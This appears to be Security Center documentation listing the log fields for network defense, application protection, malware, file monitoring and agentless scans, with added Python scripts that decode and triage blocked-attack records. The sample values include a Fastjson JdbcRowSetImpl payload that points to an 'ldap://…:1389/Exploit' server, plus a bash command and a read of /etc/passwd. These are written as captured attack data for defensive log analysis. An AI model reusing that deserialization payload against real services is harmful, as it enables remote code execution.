instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
instance_name | The instance name. | lsm |
instance_result | The impact of the risk. The value is a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | The subtype of the instance. Valid values: | INSTANCE |
instance_type | The instance type. Valid values: | ECS |
region_id | The region ID where the instance resides. | cn-hangzhou |
requirement_id | The requirement ID. You can call the ListCheckStandard operation to obtain the ID. | 5 |
risk_level | The risk level. Valid values: | MEDIUM |
section_id | The section ID. You can call the ListCheckResult operation to obtain the ID. | 1 |
standard_id | The standard ID. You can call the ListCheckStandard operation to obtain the ID. | 1 |
status | The status of the check item. Valid values: | PASS |
vendor | The cloud service provider. The value is fixed to ALIYUN. | ALIYUN |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Network defense logs
Field Name | Description | Example |
cmd | The command line of the attacked process. | nginx: master process nginx |
cur_time | The time when the attack event occurred. | 2023-09-14 09:21:59 |
decode_payload | The payload converted from HEX format to characters. | POST /Services/FileService/UserFiles/ |
dst_ip | The IP address of the attacked asset. | 172.16.XX.XX |
dst_port | The port of the attacked asset. | 80 |
func | The type of the intercepted event. Valid values: | payload |
rule_type | The specific rule type of the intercepted event. Valid values: | alinet_payload |
instance_id | The instance ID of the attacked asset. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the attacked asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the attacked asset. | 192.168.XX.XX |
final_action | The defense action. The value is fixed to block (intercepted). | block |
payload | The payload in HEX format. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | The ID of the attacked process. | 7107 |
platform | The system type of the attacked asset. Valid values: | linux |
proc_path | The path of the attacked process. | /usr/sbin/nginx |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address of the attack. | 106.11.XX.XX |
src_port | The source port that initiated the attack. | 29575 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, in seconds. This also indicates when the event occurred. | 1719472214 |
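The network defense log stores the intercepted request twice: payload as HEX and decode_payload as the decoded characters. When only the HEX form is available (or when the decoded form has been cut short), an analyst needs to decode it and read off the request line and headers, and has to cope with the masking the sample shows, where the HEX run ends in `****`. The following is an added example, not Security Center's own code: it decodes a record modelled on the sample row above, tolerates a masked or odd-length tail, and parses the HTTP request for triage. The record is constructed from the table's example values.

```python
"""Decode the HEX `payload` of a network defense log (__topic__ sas-net-block) and pull
out the HTTP request line and headers for triage.

Added example, not Security Center's own code. The field names (payload, func, rule_type,
final_action, src_ip, src_port, dst_ip, dst_port, proc_path, pid) follow the table above;
the record is constructed from the table's example values, with the masked `****` tail."""
import binascii
import re

SAMPLE_NET_BLOCK = {
    "func": "payload", "rule_type": "alinet_payload", "final_action": "block",
    "src_ip": "106.11.0.1", "src_port": 29575, "dst_ip": "172.16.0.2", "dst_port": 80,
    "proc_path": "/usr/sbin/nginx", "pid": 7107,
    "payload": "504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e"
               "0d0a557365722d4167656e743a20****",
}

HEX_PREFIX = re.compile(r"^[0-9a-fA-F]*")


def decode_hex_payload(hex_payload):
    """Decode the leading run of hex digits; anything after it (masking such as ****)
    is dropped and an odd trailing nibble is discarded rather than raising.
    Returns (decoded_bytes, truncated) where truncated says whether anything was dropped."""
    run = HEX_PREFIX.match(hex_payload).group(0)
    if len(run) % 2:
        run = run[:-1]
    return binascii.unhexlify(run), len(run) != len(hex_payload)


def parse_http_request(raw):
    """Split decoded bytes into method, target, version and a lower-cased header dict.
    Returns None when the bytes do not start with an HTTP request line."""
    text = raw.decode("latin-1")   # one byte per character, so binary junk cannot raise
    head = text.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = re.match(r"^([A-Z]+) (\S+) (HTTP/\d\.\d)$", lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": m.group(1), "target": m.group(2), "version": m.group(3), "headers": headers}


def summarize_block(record):
    """One triage line per record: who, what was hit, what the request looked like."""
    raw, truncated = decode_hex_payload(record["payload"])
    req = parse_http_request(raw)
    return {
        "action": record["final_action"], "rule": record["rule_type"],
        "source": f"{record['src_ip']}:{record['src_port']}",
        "target": f"{record['dst_ip']}:{record['dst_port']} ({record['proc_path']}, pid {record['pid']})",
        "request_line": f"{req['method']} {req['target']} {req['version']}" if req else None,
        "headers": req["headers"] if req else {},
        "payload_truncated": truncated,
    }


if __name__ == "__main__":
    print(summarize_block(SAMPLE_NET_BLOCK))
```

The masked sample decodes to `POST / HTTP/1.1`, a `Content-Type: text/plain` header and a `User-Agent:` header whose value was cut off by the masking, and the summary flags that truncation so nobody mistakes an empty User-Agent for a real one.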
Application protection logs
Field Name | Description | Example |
app_dir | The directory where the application resides. | /usr/local/aegis/rasp/apps/1111 |
app_id | The application ID. | 6492a391fc9b4e2aad94**** |
app_name | The name of the application. | test |
confidence_level | The confidence level of the detection algorithm. Valid values: | low |
request_body | The request body. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | The length of the request body. | 112 |
data | The hook point parameters. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | The request header. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | The name of the host or network device. | testhostname |
host_ip | The private IP address of the host. | 172.16.XX.XX |
is_cliped | Indicates whether the log was truncated because it was too long. Valid values: | false |
jdk_version | The JDK version. | 1.8.0_292 |
message | The alert description. | Unsafe class serial. |
request_method | The request method. | Post |
platform | The operating system type. | Linux |
arch | The operating system architecture. | amd64 |
kernel_version | The operating system kernel version. | 3.10.0-1160.59.1.el7.x86_64 |
param | The request parameters. Common formats include the following: | {"url":["http://127.0.0.1.xip.io"]} |
payload | An effective attack payload. | bash -c kill -0 -- -'31098' |
payload_length | The length of the attack payload. | 27 |
rasp_id | The unique ID of the application protection probe. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | The version of the application protection probe. | 0.8.5 |
src_ip | The IP address of the requester. | 172.0.XX.XX |
final_action | The result of how the alert is handled. Valid values: | block |
rule_action | The alert handling method specified by the rule. Valid values: | block |
risk_level | The risk level. Valid values: | high |
stacktrace | The stack information. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | The time when the alert was triggered. | 2023-10-09 15:19:15 |
timestamp | The timestamp when the alert was triggered, in milliseconds. | 1696835955070 |
type | The attack type. Valid values: | rce |
url | The request URL. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | The UUID of the attack event. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | The host UUID. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | The public IP address of the host. | 1.2.XX.XX |
intranet_ip | The private IP address of the host. | 172.16.XX.XX |
sas_group_name | The name of the server group in Security Center. | Group 1 |
instance_id | The host instance ID. | i-wz995eivg28f1m** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
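As an added example (not code from the page or from the product), a small Python triage pass over application protection records in the schema above: it flags events where rule_action was block but final_action was not, unblocked high-risk rce events, truncated records (is_cliped) and payload/payload_length inconsistencies, and counts attempts per src_ip. The field names come from the table; the record contents and the value log_only are constructed placeholders, not documented enum values.

```python
import json
from collections import Counter

# Constructed newline-delimited records using the field names from the table above.
# Only "rce", "high", "low", "block" and "true"/"false" appear on the page; the value
# "log_only" and every other content is a placeholder for this example.
RAW_LOGS = """\
{"rasp_attack_uuid":"atk-0001","uuid":"host-a","app_name":"demo","type":"rce","risk_level":"high","confidence_level":"high","rule_action":"block","final_action":"block","is_cliped":"false","src_ip":"198.51.100.7","url":"http://127.0.0.1:999/demo/Serial","payload":"bash -c kill -0 -- -'31098'","payload_length":27}
{"rasp_attack_uuid":"atk-0002","uuid":"host-a","app_name":"demo","type":"rce","risk_level":"high","confidence_level":"low","rule_action":"block","final_action":"log_only","is_cliped":"true","src_ip":"198.51.100.7","url":"http://127.0.0.1:999/demo/Serial","payload":"bash -c","payload_length":7}
{"rasp_attack_uuid":"atk-0003","uuid":"host-b","app_name":"shop","type":"rce","risk_level":"low","confidence_level":"low","rule_action":"log_only","final_action":"log_only","is_cliped":"false","src_ip":"203.0.113.9","url":"http://127.0.0.1:999/shop/search","payload":"id","payload_length":3}
"""


def parse_records(text):
    """Parse NDJSON export text into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_truncated(rec):
    # The page shows is_cliped as the string "false"; a JSON export may carry a
    # boolean instead, so both forms are normalised here.
    return str(rec.get("is_cliped", "false")).lower() == "true"


def classify(rec):
    """Return triage tags for one application protection record (empty = routine)."""
    tags = []
    if rec.get("rule_action") == "block" and rec.get("final_action") != "block":
        tags.append("rule_block_not_enforced")  # rule asked to block, outcome differs
    if (rec.get("type") == "rce" and rec.get("risk_level") == "high"
            and rec.get("final_action") != "block"):
        tags.append("unblocked_high_risk_rce")  # request reached the app: respond
    if is_truncated(rec):
        tags.append("truncated_record")  # fetch the full request before concluding
    elif rec.get("payload") is not None and len(rec["payload"]) != rec.get("payload_length"):
        tags.append("payload_length_mismatch")  # length should match when not clipped
    return tags


def triage(text):
    """Return ({rasp_attack_uuid: tags} for records needing attention, attempts per src_ip)."""
    recs = parse_records(text)
    needs_attention = {}
    for rec in recs:
        tags = classify(rec)
        if tags:
            needs_attention[rec["rasp_attack_uuid"]] = tags
    attempts = Counter(rec["src_ip"] for rec in recs)
    return needs_attention, attempts


if __name__ == "__main__":
    flagged, per_source = triage(RAW_LOGS)
    for attack_id, tags in flagged.items():
        print(attack_id, ",".join(tags))
    print(dict(per_source))
```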
Malware detection logs
Field Name | Description | Example |
bucket_name | The bucket name. | ***-test |
event_id | The alert ID. | 802210 |
event_name | The alert name. | Mining program |
md5 | The MD5 hash of the file. | 6bc2bc******53d409b1 |
sha256 | The SHA256 hash of the file. | f038f9525******7772981e87f85 |
result | The detection result. Valid values: | 0 |
file_path | The file path. | test.zip/bin_test |
etag | The OSS file identifier. | 6BC2B******853D409B1 |
risk_level | The risk level. Valid values: | remind |
source | The detection scenario. Valid values: | OSS |
parent_md5 | The MD5 hash of the parent class file or compressed package. | 3d0f8045bb9****** |
parent_sha256 | The SHA256 hash of the parent file or compressed package. | 69b643d6******a3fb859fa |
parent_file_path | The name of the parent file or compressed package. | test.zip |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
compress_file_number | The ordinal number of the file within the compressed package, in the format current/total. | 1/10: The archive contains 10 files. This is file 1. |
Core file monitoring event logs
Field Name | Description | Example |
start_time | The most recent time the event occurred. Unit: seconds. | 1718678414 |
uuid | The UUID of the agent. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | The file path. | /etc/passwd |
proc_path | The process path. | /usr/bin/bash |
rule_id | The ID of the rule that was hit. | 123 |
rule_name | The rule name. | file_test_rule |
cmdline | The command line. | bash /opt/a |
operation | The operation on the file. | READ |
risk_level | The alert level. | 2 |
pid | The process ID. | 45324 |
proc_permission | The process permissions. | rwxrwxrwx |
instance_id | The instance ID. | i-wz995eivg2**** |
internet_ip | The public IP address. | 192.0.2.1 |
intranet_ip | The private IP address. | 172.16.0.1 |
instance_name | The instance name. | aegis-test |
platform | The operating system type. | Linux |
Agentless detection logs
Common fields for vulnerabilities, baselines, and malicious samples
Field name | Description | Example |
uuid | The server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Vulnerability risk fields
Field Name | Description | Example |
vul_name | The name of the vulnerability. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | The alias of the vulnerability. | gson code issue vulnerability (CVE-2022-25647) |
vul_primary_id | The primary key ID of the vulnerability. | 990174361 |
type | The vulnerability type. Valid values: | sca |
alert_level | The risk level of the vulnerability. Valid values: | asap |
instance_name | The hostname. | hhht-linux-*** |
operation | The action performed on the vulnerability. Valid values: | new |
status | The status information of the vulnerability. Valid values: | 1 |
tag | The tag of the vulnerability. Valid values: Note The tags for other vulnerability types are random strings. | oval |
Baseline check fields
Field name | Description | Example |
check_item_name | The name of the check item. | Set password expiration time |
check_item_level | The risk level of the check item. Valid values: | high |
check_type | The type of the check item. | Identity authentication |
risk_level | The risk level of the risk item. Valid values: | low |
operation | The operation. Valid values: | new |
risk_name | The name of the risky check item. | Password policy compliance check |
status | The status of the check item. Valid values: | 1 |
sub_type_alias_name | The alias of the subtype. | Alibaba Cloud standard - CentOS Linux 7/8 security baseline |
sub_type_name | The name of the baseline subtype. For more information about the valid values of the baseline subtype, see List of baseline types and subtypes. | hc_centos7 |
type_name | The type name. | hc_best_security |
type_alias_name | The alias of the type. | Best practices |
container_id | The container ID. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | The container name. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Malicious sample fields
Field name | Description | Example |
alert_level | The risk level of the alert event. Valid values: | suspicious |
alert_name | The name of the malicious sample alert. | Suspicious Process - SSH-based |
operation | The operation. Valid values: | new |
status | The risk status of the malicious sample. Valid values: | 0 |
suspicious_event_id | The alert event ID. | 909361 |
Sensitive file fields
Field name | Description | Example |
alert_level | The risk level. Valid values: | high |
rule_name | The file type name. | Ionic token |
file_path | The path of the sensitive file. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | The check result. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Appendix
List of baseline types and subtypes
Type name | Subtype name | Description |
hc_exploit | hc_exploit_redis | Important threat exploit: Unauthorized access to Redis |
hc_exploit | hc_exploit_activemq | Important threat exploit: Unauthorized access to ActiveMQ |
hc_exploit | hc_exploit_couchdb | Important threat exploit: Unauthorized access to CouchDB |
hc_exploit | hc_exploit_docker | Important threat exploit: Unauthorized access to Docker |
hc_exploit | hc_exploit_es | Important threat exploit: Unauthorized access to Elasticsearch |
hc_exploit | hc_exploit_hadoop | Important threat exploit: Unauthorized access to Hadoop |
hc_exploit | hc_exploit_jboss | Important threat exploit: Unauthorized access to JBoss |
hc_exploit | hc_exploit_jenkins | Important threat exploit: Unauthorized access to Jenkins |
hc_exploit | hc_exploit_k8s_api | Important threat exploit: Unauthorized access to Kubernetes API server |
hc_exploit | hc_exploit_ldap | Important threat exploit: Unauthorized access to LDAP (Windows environment) |
hc_exploit | hc_exploit_ldap_linux | Important threat exploit: Unauthorized access to OpenLDAP (Linux environment) |
hc_exploit | hc_exploit_memcache | Important threat exploit: Unauthorized access to Memcached |
hc_exploit | hc_exploit_mongo | Important threat exploit: Unauthorized access to MongoDB |
hc_exploit | hc_exploit_pgsql | Important threat exploit: Unauthorized access to PostgreSQL |
hc_exploit | hc_exploit_rabbitmq | Important threat exploit: Unauthorized access to RabbitMQ |
hc_exploit | hc_exploit_rsync | Important threat exploit: Unauthorized access to rsync |
hc_exploit | hc_exploit_tomcat | Important threat exploit: Apache Tomcat AJP file inclusion vulnerability |
hc_exploit | hc_exploit_zookeeper | Important threat exploit: Unauthorized access to ZooKeeper |
hc_container | hc_docker | Alibaba Cloud standard: Docker security baseline check |
hc_container | hc_middleware_ack_master | International security best practices: Kubernetes (ACK) master node security baseline check |
hc_container | hc_middleware_ack_node | International security best practices: Kubernetes (ACK) node security baseline check |
hc_container | hc_middleware_k8s | Alibaba Cloud standard: Kubernetes master node security baseline check |
hc_container | hc_middleware_k8s_node | Alibaba Cloud standard: Kubernetes node security baseline check |
cis | hc_suse15_djbh | MLPS 2.0 Level 3: SUSE 15 compliance baseline check |
cis | hc_aliyun_linux3_djbh_l3 | MLPS 2.0 Level 3: Alibaba Cloud Linux 3 compliance baseline check |
cis | hc_aliyun_linux_djbh_l3 | MLPS 2.0 Level 3: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check |
cis | hc_bind_djbh | MLPS 2.0 Level 3: Bind compliance baseline check |
cis | hc_centos6_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 6 compliance baseline check |
cis | hc_centos7_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 7 compliance baseline check |
cis | hc_centos8_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 8 compliance baseline check |
cis | hc_debian_djbh_l3 | MLPS 2.0 Level 3: Debian Linux 8/9/10 compliance baseline check |
cis | hc_iis_djbh | MLPS 2.0 Level 3: IIS compliance baseline check |
cis | hc_informix_djbh | MLPS 2.0 Level 3: Informix compliance baseline check |
cis | hc_jboss_djbh | MLPS 2.0 Level 3: JBoss compliance baseline check |
cis | hc_mongo_djbh | MLPS 2.0 Level 3: MongoDB compliance baseline check |
cis | hc_mssql_djbh | MLPS 2.0 Level 3: SQL Server compliance baseline check |
cis | hc_mysql_djbh | MLPS 2.0 Level 3: MySQL compliance baseline check |
cis | hc_nginx_djbh | MLPS 2.0 Level 3: Nginx compliance baseline check |
cis | hc_oracle_djbh | MLPS 2.0 Level 3: Oracle compliance baseline check |
cis | hc_pgsql_djbh | MLPS 2.0 Level 3: PostgreSQL compliance baseline check |
cis | hc_redhat6_djbh_l3 | MLPS 2.0 Level 3: Red Hat Linux 6 compliance baseline check |
cis | hc_redhat_djbh_l3 | MLPS 2.0 Level 3: Red Hat Linux 7 compliance baseline check |
cis | hc_redis_djbh | MLPS 2.0 Level 3: Redis compliance baseline check |
cis | hc_suse10_djbh_l3 | MLPS 2.0 Level 3: SUSE 10 compliance baseline check |
cis | hc_suse12_djbh_l3 | MLPS 2.0 Level 3: SUSE 12 compliance baseline check |
cis | hc_suse_djbh_l3 | MLPS 2.0 Level 3: SUSE 11 compliance baseline check |
cis | hc_ubuntu14_djbh_l3 | MLPS 2.0 Level 3: Ubuntu 14 compliance baseline check |
cis | hc_ubuntu_djbh_l3 | MLPS 2.0 Level 3: Ubuntu 16/18/20 compliance baseline check |
cis | hc_was_djbh | MLPS 2.0 Level 3: WebSphere Application Server compliance baseline check |
cis | hc_weblogic_djbh | MLPS 2.0 Level 3: WebLogic compliance baseline check |
cis | hc_win2008_djbh_l3 | MLPS 2.0 Level 3: Windows 2008 R2 compliance baseline check |
cis | hc_win2012_djbh_l3 | MLPS 2.0 Level 3: Windows 2012 R2 compliance baseline check |
cis | hc_win2016_djbh_l3 | MLPS 2.0 Level 3: Windows 2016/2019 compliance baseline check |
cis | hc_aliyun_linux_djbh_l2 | MLPS 2.0 Level 2: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check |
cis | hc_centos6_djbh_l2 | MLPS 2.0 Level 2: CentOS Linux 6 compliance baseline check |
cis | hc_centos7_djbh_l2 | MLPS 2.0 Level 2: CentOS Linux 7 compliance baseline check |
cis | hc_debian_djbh_l2 | MLPS 2.0 Level 2: Debian Linux 8 compliance baseline check |
cis | hc_redhat7_djbh_l2 | MLPS 2.0 Level 2: Red Hat Linux 7 compliance baseline check |
cis | hc_ubuntu_djbh_l2 | MLPS 2.0 Level 2: Ubuntu 16/18 compliance baseline check |
cis | hc_win2008_djbh_l2 | MLPS 2.0 Level 2: Windows 2008 R2 compliance baseline check |
cis | hc_win2012_djbh_l2 | MLPS 2.0 Level 2: Windows 2012 R2 compliance baseline check |
cis | hc_win2016_djbh_l2 | MLPS 2.0 Level 2: Windows 2016/2019 compliance baseline check |
cis | hc_aliyun_linux_cis | International security best practices: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check |
cis | hc_centos6_cis_rules | International security best practices: CentOS Linux 6 security baseline check |
cis | hc_centos7_cis_rules | International security best practices: CentOS Linux 7 security baseline check |
cis | hc_centos8_cis_rules | International security best practices: CentOS Linux 8 security baseline check |
cis | hc_debian8_cis_rules | International security best practices: Debian Linux 8 security baseline check |
cis | hc_ubuntu14_cis_rules | International security best practices: Ubuntu 14 security baseline check |
cis | hc_ubuntu16_cis_rules | International security best practices: Ubuntu 16/18/20 security baseline check |
cis | hc_win2008_cis_rules | International security best practices: Windows Server 2008 R2 security baseline check |
cis | hc_win2012_cis_rules | International security best practices: Windows Server 2012 R2 security baseline check |
cis | hc_win2016_cis_rules | International security best practices: Windows Server 2016/2019 R2 security baseline check |
cis | hc_kylin_djbh_l3 | MLPS 2.0 Level 3: Kylin compliance baseline check |
cis | hc_uos_djbh_l3 | MLPS 2.0 Level 3: UOS compliance baseline check |
hc_best_security | hc_aliyun_linux | Alibaba Cloud standard: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check |
hc_best_security | hc_centos6 | Alibaba Cloud standard: CentOS Linux 6 security baseline check |
hc_best_security | hc_centos7 | Alibaba Cloud standard: CentOS Linux 7/8 security baseline check |
hc_best_security | hc_debian | Alibaba Cloud standard: Debian Linux 8/9/10 security baseline check |
hc_best_security | hc_redhat6 | Alibaba Cloud standard: Red Hat Linux 6 security baseline check |
hc_best_security | hc_redhat7 | Alibaba Cloud standard: Red Hat Linux 7/8 security baseline check |
hc_best_security | hc_ubuntu | Alibaba Cloud standard: Ubuntu security baseline check |
hc_best_security | hc_windows_2008 | Alibaba Cloud standard: Windows 2008 R2 security baseline check |
hc_best_security | hc_windows_2012 | Alibaba Cloud standard: Windows 2012 R2 security baseline check |
hc_best_security | hc_windows_2016 | Alibaba Cloud standard: Windows 2016/2019 security baseline check |
hc_best_security | hc_db_mssql | Alibaba Cloud standard: SQL Server security baseline check |
hc_best_security | hc_memcached_ali | Alibaba Cloud standard: Memcached security baseline check |
hc_best_security | hc_mongodb | Alibaba Cloud standard: MongoDB 3.x security baseline check |
hc_best_security | hc_mysql_ali | Alibaba Cloud standard: MySQL security baseline check |
hc_best_security | hc_oracle | Alibaba Cloud standard: Oracle 11g security baseline check |
hc_best_security | hc_pgsql_ali | Alibaba Cloud standard: PostgreSQL security baseline check |
hc_best_security | hc_redis_ali | Alibaba Cloud standard: Redis security baseline check |
hc_best_security | hc_apache | Alibaba Cloud standard: Apache security baseline check |
hc_best_security | hc_iis_8 | Alibaba Cloud standard: IIS 8 security baseline check |
hc_best_security | hc_nginx_linux | Alibaba Cloud standard: Nginx security baseline check |
hc_best_security | hc_suse15 | Alibaba Cloud standard: SUSE Linux 15 security baseline check |
hc_best_security | tomcat7 | Alibaba Cloud standard: Apache Tomcat security baseline check |
weak_password | hc_mongodb_pwd | Weak password: MongoDB logon weak password detection (supports version 2.x) |
weak_password | hc_weakpwd_ftp_linux | Weak password: FTP logon weak password check |
weak_password | hc_weakpwd_linux_sys | Weak password: Linux system logon weak password check |
weak_password | hc_weakpwd_mongodb3 | Weak password: MongoDB logon weak password detection |
weak_password | hc_weakpwd_mssql | Weak password: SQL Server database logon weak password check |
weak_password | hc_weakpwd_mysql_linux | Weak password: MySQL database logon weak password check |
weak_password | hc_weakpwd_mysql_win | Weak password: MySQL database logon weak password check (Windows) |
weak_password | hc_weakpwd_openldap | Weak password: OpenLDAP logon weak password check |
weak_password | hc_weakpwd_oracle | Weak password: Oracle logon weak password detection |
weak_password | hc_weakpwd_pgsql | Weak password: PostgreSQL database logon weak password check |
weak_password | hc_weakpwd_pptp | Weak password: pptpd service logon weak password check |
weak_password | hc_weakpwd_redis_linux | Weak password: Redis database logon weak password check |
weak_password | hc_weakpwd_rsync | Weak password: rsync service logon weak password check |
weak_password | hc_weakpwd_svn | Weak password: SVN service logon weak password check |
weak_password | hc_weakpwd_tomcat_linux | Weak password: Apache Tomcat console weak password check |
weak_password | hc_weakpwd_vnc | Weak password: VNC Server weak password check |
weak_password | hc_weakpwd_weblogic | Weak password: WebLogic 12c logon weak password detection |
weak_password | hc_weakpwd_win_sys | Weak password: Windows system logon weak password check |